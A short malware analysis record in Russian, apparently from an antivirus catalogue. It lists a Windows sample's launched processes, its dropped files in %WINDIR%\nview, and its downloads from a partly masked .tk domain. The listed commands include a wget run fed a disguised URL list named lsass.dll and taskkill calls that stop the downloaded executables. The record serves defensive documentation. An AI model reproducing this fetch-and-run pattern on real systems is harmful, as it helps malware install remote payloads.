Техническая информация
- '%WINDIR%\nview\inst.exe'
- '%WINDIR%\nview\nvst.exe'
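- '%WINDIR%\nview\wget.exe' -i lsass.dll --continue (ключ -i передаёт wget файл со списком URL для загрузки, то есть lsass.dll здесь, судя по командной строке, используется как список адресов, а не как библиотека)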
- '%WINDIR%\nview\rabr.exe'
- '' (имя файла в отчёте пустое; загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /f /im inst.exe
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 8
- '<SYSTEM32>\taskkill.exe' /f /im rabr.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\nview\runer.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im nvst.exe
Файлы (тип операции с ними в этом фрагменте не указан):
- %WINDIR%\nview\nvst.exe
- %WINDIR%\nview\inst.exe
- %WINDIR%\nview\rabr.exe
- %WINDIR%\nview\frame.dll
- %WINDIR%\nview\runer.bat
- %WINDIR%\nview\wget.exe
- %WINDIR%\nview\lsass.dll
- 'ab###.pomper.tk':80
- http://ab###.pomper.tk/rabr.exe
- http://ab###.pomper.tk/inst.exe
- http://ab###.pomper.tk/nvst.exe
- DNS ASK ab###.pomper.tk
- ClassName: '' WindowName: ''
- ClassName: 'EDIT' WindowName: ''